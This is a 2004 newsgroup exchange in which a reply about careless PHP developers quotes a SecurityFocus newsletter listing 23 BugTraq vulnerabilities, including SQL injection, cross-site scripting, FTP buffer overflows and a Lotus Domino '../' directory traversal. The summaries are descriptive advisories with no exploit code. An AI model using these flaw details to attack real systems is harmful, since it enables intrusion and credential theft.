From: "Antti Kurenniemi" 

I wouldn't blame those on PHP (though it certainly makes it very easy to
write unsafe code), but more on lazy / incompetent developers / testers. I
think it doesn't really depend on what language you use, if you do database
stuff that has any user input you simply must validate all input before
proceeding, in each and every step.


Antti Kurenniemi
(I'm currently re-teaching PHP to a student who has learnt it in school
really really bad - he does all of these mistakes)

"Geo."  wrote in message
news:405f4e5a$1{at}w3.nls.net...
> Thought you might find this interesting as people are always asking me why
I
> don't use php. Here's the list for this securityfocus newletter I received
> today:
>
> (I don't know why they make it sound like these are MS issues, it's just
the
> MS platform)
>
> II. MICROSOFT VULNERABILITY SUMMARY
> -----------------------------------
> 1. Dogpatch Software CFWebstore SQL Injection Vulnerability
> BugTraq ID: 9854
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9854
> Summary:
> It has been reported that CFWebstore is prone to a remote SQL injection
> vulnerability. This issue is due to a failure of the application to
> properly sanitize user input before including it in an SQL statement.
> As a result of this a malicious user may influence database queries in
> order to view or modify sensitive information, potentially compromising
> the software or the database. It has been reported that an attacker may be
> able to disclose the administrator password hash by exploiting this issue.
>
> 2. Dogpatch Software CFWebstore Cross-Site Scripting Vulnerabil...
> BugTraq ID: 9856
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9856
> Summary:
> It has been reported that CFWebstore is prone to a remote cross-site
> scripting vulnerability. This issue is due to a failure of the
> application to properly sanitize user input.
> Attackers may exploit this vulnerability to steal authentication
> credentials. Other attacks may also be possible.
>
> 3. Emumail EMU Webmail Multiple Vulnerabilities
> BugTraq ID: 9861
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9861
> Summary:
> Multiple vulnerabilities have been identified in the application that may
> allow an attacker to carry out cross-site scripting attacks and disclose
> the path to the victim's home directory. The issues are reported to exist
> in the login script, 'emumail.fcgi' script and the 'init.emu' sample
> script.
> EMU Webmail 5.2.7 has been reported to be affected by these issues.
>
> 4. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
> BugTraq ID: 9865
> Remote: Yes
> Date Published: Mar 13 2004
> Relevant URL: http://www.securityfocus.com/bid/9865
> Summary:
> It has been reported that one of the scripts included with phpBB is prone
> to a cross-site scripting vulnerability. According to the author of the
> report, the script "viewtopic.php" returns the value of the
HTML variable
> "postdays" to the client as its output without encoding it
or otherwise
> removing potentially hostile content. This can be exploited by
> constructing malicious links with the malicious "postdays"
variable value
> embedded as a GET request style HTML variable. If the target user visits
> such a link, the malicious, externally created content supplied in the
> link will be rendered (or executed, in the case of script code) as part of
> the viewtopic.php document and within the context of the vulnerable
> website (including the phpBB forum).
>
> 5. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
> BugTraq ID: 9866
> Remote: Yes
> Date Published: Mar 13 2004
> Relevant URL: http://www.securityfocus.com/bid/9866
> Summary:
> It has been reported that one of the scripts included with phpBB is prone
> to a cross-site scripting vulnerability. According to the author of the
> report, the script "viewforum.php" returns the value of the
HTML variable
> "topicdays" to the client as its output without encoding it
or otherwise
> removing potentially hostile content. This can be exploited by
> constructing malicious links with the malicious "topicdays"
variable value
> embedded as a GET request style HTML variable. If the target user visits
> such a link, the malicious, externally created content supplied in the
> link will be rendered (or executed, in the case of script code) as part of
> the viewtopic.php document and within the context of the vulnerable
> website (including the phpBB forum).
>
> 6. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
> BugTraq ID: 9870
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9870
> Summary:
> It has been reported that Check Point Firewall-1 SmartDashboard may be
> prone to a buffer overflow vulnerability that may allow an attacker to
> execute arbitrary code on a vulnerable system in order to gain
> unauthorized access. The issue is reported to present itself when the
> SmartTracker utility is used to add a firewall filter for Firewall-1. An
> attacker may be able to cause a buffer overflow condition by supplying an
> excessive amount of data via the filter line.
> It is likely that access to SmartDashboard requires administrator
> credentials, in which case this issue would not be considered a
> vulnerability. This has not been confirmed at the moment. Due to a lack
> of information further details cannot be outlined at the moment. This BID
> will be updated as more information becomes available.
> This vulnerability is reported to affect SmartDashboard supplied with
> Check Point Software NG-AI R54 and NG-AI R55, however, other versions
> could be affected as well.
>
> 7. WS_FTP Pro Client Remote Buffer Overflow Vulnerability
> BugTraq ID: 9872
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9872
> Summary:
> It has been reported that WS_FTP Pro client may be prone to a remote
> buffer overflow vulnerability that may allow an attacker to execute
> arbitrary code on a vulnerable system. An attacker may be able to cause a
> buffer overflow condition in the client by supplying a file or a directory
> with a large name exceeding 260 bytes without a terminating CR/LF
> character to the server. The buffer overflow condition would occur when
> the client attempts to browse through the attacker-supplied directory.
> This issue is reported to affect WS_FTP Pro 8.02 and 8.03, however, other
> versions may be affected as well.
>
> 8. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
> BugTraq ID: 9873
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9873
> Summary:
> It has been reported that YaBB and YaBB SE are prone to multiple
> cross-site scripting vulnerabilities. These issues are due to a failure
> of the applications to properly validate URI supplied user input.
> Attackers may exploit this vulnerability to steal authentication
> credentials. Other attacks may also be possible.
>
> 9. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
> BugTraq ID: 9877
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9877
> Summary:
> A problem has been identified in several different SOAP servers when
> handling certain types of requests. Because of this, it is possible for an
> attacker to force a denial of service on systems using a vulnerable
> implementation.
> This BID will be updated as further details regarding this vulnerability
> are made public.
>
> 10. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
> BugTraq ID: 9879
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9879
> Summary:
> It has been reported that PHP-Nuke may be prone to multiple cross-site
> scripting vulnerabilities. These vulnerabilities occur due to
> insufficient sanitization of user-supplied data via the 'Your Name',
> 'nicname', 'fname', 'ratenum', and 'search' fields of 'modules.php'
> script. Exploitation could allow for theft of cookie-based authentication
> credentials. Other attacks are also possible.
> PHP-Nuke 7.1.0 has been reported to be prone to these issues, however, it
> is possible that other versions are affected as well. These issues are
> undergoing further analysis. These issues will be separated into
> individual BIDs once analysis is complete.
>
> 11. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
> BugTraq ID: 9883
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9883
> Summary:
> A vulnerability has been reported to exist in the software that may allow
> a remote user to inject malicious SQL syntax into database queries. The
> problem reportedly exists in one of the parameters of the search.php
> script. This issue is caused by insufficient sanitization of user-supplied
> data. A remote attacker may exploit this issue to influence SQL query
> logic to disclose sensitive information that could be used to gain
> unauthorized access.
>
> 12. SteelID thePhotoTool Login.ASP SQL Injection Vulnerability
> BugTraq ID: 9884
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9884
> Summary:
> SteelID thePhotoTool is prone to an SQL injection vulnerability. The issue
> is reported to exist in the 'login.asp' script, which does not
> sufficiently sanitize user-supplied input before including it in SQL
> queries. This could permit remote attackers to pass malicious input to
> database queries, resulting in modification of query logic or other
> attacks.
>
> 13. WS_FTP Pro Client Remote Stack Buffer Overflow Vulnerability
> BugTraq ID: 9886
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9886
> Summary:
> It has been reported that WS_FTP Pro client may be prone to a remote
> buffer overflow vulnerability that may allow an attacker to execute
> arbitrary code on a vulnerable system in order to gain unauthorized
> access. The issue is reported to present itself when the client views
> directory listings containing files and directory names of excessive
> length without a terminating CR/LF character. This vulnerability exists
> in WS_FTP Pro version 8.0.3, which was released to fix the WS_FTP Pro
> Client Remote Buffer Overflow Vulnerability described in BID 9872. It has
> been reported that the fixed version limits user-supplied data to 0x0200
> bytes; however, the buffer is allocated to 0x0100 bytes.
> Although this issue is reported to affect WS_FTP Pro 8.0.3, it is quite
> likely that it affects previous versions as well.
>
> 14. Mambo Open Source Index.PHP Cross-Site Scripting Vulnerabili...
> BugTraq ID: 9890
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9890
> Summary:
> It has been reported that the Mambo 'index.php' script is prone to a
> cross-site scripting vulnerability. This issue is due to a failure of the
> application to properly validate user supplied URI input. This issue
> could permit a remote attacker to create a malicious link to the
> vulnerable application that includes hostile HTML and script code. If this
> link were followed, the hostile code may be rendered in the web browser of
> the victim user.
>
> 15. Mambo Open Source Index.PHP SQL Injection Vulnerability
> BugTraq ID: 9891
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9891
> Summary:
> It has been reported that the Mambo 'index.php' script is prone to an SQL
> injection vulnerability. This issue is due to a failure of the
> application to properly validate user supplied URI input.
> As a result of this a malicious user may influence database queries in
> order to view or modify sensitive information, potentially compromising
> the software or the database. It may be possible for an attacker to
> disclose the administrator password hash by exploiting this issue.
>
> 16. Microsoft Windows XP explorer.exe Remote Denial of Service V...
> BugTraq ID: 9892
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9892
> Summary:
> It has been reported that Windows Explorer for Windows XP may be prone to
> a denial of service vulnerability that may allow a remote attacker to
> cause the system to hang by sending a malicious directory containing 'wmf'
> files to a vulnerable user via e-mail or other means. Windows Explorer
> automatically attempts to parse 'wmf' files in the directory, however, an
> exceptional condition occurs if the directory contains records of zero
> length.
> Although unconfirmed, all versions of Windows XP are considered to be
> affected by this vulnerability.
>
> 17. PhpBB admin_words.php Multiple Vulnerabilities
> BugTraq ID: 9896
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9896
> Summary:
> It has been reported that PhpBB may be prone to multiple vulnerabilities
> that may allow an attacker to carry out SQL injection and cross-site
> scripting attacks. These issues are reported to affect the 'id' parameter
> of 'admin_words.php' module. The SQL injection attack requires
> administrator level access.
> PhpBB version 2.0.6c has been reported to be affected by these issues,
> however, it is possible that other versions are affected as well.
>
> 18. Techland Chrome Denial of Service Vulnerability
> BugTraq ID: 9898
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9898
> Summary:
> Reportedly Chrome is prone to a remote denial of service vulnerability.
> This issue is due to a failure to validate input of data received via
> network communications.
> This issue may allow a remote attacker to cause the affected server to
> crash, denying service to legitimate users. It has been conjectured that
> this issue may be leveraged to execute arbitrary code on the affected
> system in the context of the vulnerable process, however this is
> unconfirmed.
>
> 19. IBM Lotus Domino HTTP webadmin.nsf Directory Traversal Vulne...
> BugTraq ID: 9900
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9900
> Summary:
> It has been reported that Lotus Domino may be prone to a directory
> traversal vulnerability that may allow a remote attacker to access
> information outside the server root directory. The issue reportedly
> exists in the server's administrative interface accessed via
> 'webadmin.nsf'. The vulnerability may be exploited by a remote attacker
> by traversing outside the server root directory by using '../' directory
> traversal character sequences. Successful exploitation of this
> vulnerability may allow a remote attacker to gain access to sensitive
> information and/or modify the underlying file system.
> IBM Lotus Domino server 6.5.1 has been reported to be prone to this issue,
> however, it is possible that other versions are affected as well.
>
> 20. IBM Lotus Domino HTTP webadmin.nsf Quick Console Cross-Site...
> BugTraq ID: 9901
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9901
> Summary:
> It has been reported that Lotus Domino server may be prone to a cross-site
> scripting vulnerability that may allow a remote attacker to execute HTML
> or script code in a user's browser. The issue presents itself due to
> insufficient sanitization of user-supplied data via the 'Quick Console'
> function of 'webadmin.nsf' administrative interface.
> IBM Lotus Domino server 6.5.1 has been reported to be prone to this issue,
> however, it is possible that other versions are affected as well.
>
> 21. GlobalSCAPE Secure FTP Server SITE Command Remote Buffer Ove...
> BugTraq ID: 9904
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9904
> Summary:
> It has been reported that Secure FTP Server may be prone to a remote
> buffer overflow vulnerability that may allow attackers to execute
> arbitrary code on a vulnerable system in order to gain unauthorized
> access. An attacker may cause the buffer overflow condition to occur by
> sending about 252 bytes of data via a parameter of the SITE Command.
> Immediate consequences of an attack may result in a denial of service
> condition. The possibility of remote code execution has not been
> confirmed at the moment.
> Secure FTP Server version 2.0 Build 03.11.2004.2 has been reported to
> prone to this issue.
>
> 22. DameWare Mini Remote Control Server Weak Encryption Implemen...
> BugTraq ID: 9909
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9909
> Summary:
> DameWare Mini Remote Control Server has been reported to be prone to a
> weak encryption implementation.
> It has been reported that analysis of encrypted traffic will reveal the
> block cipher that is used by DameWare Mini Remote Control to encrypt the
> plaintext data using ECB (Electronic Code Book) mode. This may ultimately
> allow an attacker to determine the block cipher and thereby expose
> plaintext credentials by reversing the process.
>
> 23. Belchior Foundry VCard Authentication Bypass Vulnerability
> BugTraq ID: 9910
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9910
> Summary:
> It has been reported that vCard is prone to a remote authentication bypass
> vulnerability. This issue is due to a design error that would allow a
> malicious user access to certain admin functionality without having to
> first authenticate to the application.
> This issue may be leveraged to manipulate the application database,
> potentially destroying data.
>
>

--- BBBS/NT v4.01 Flag-5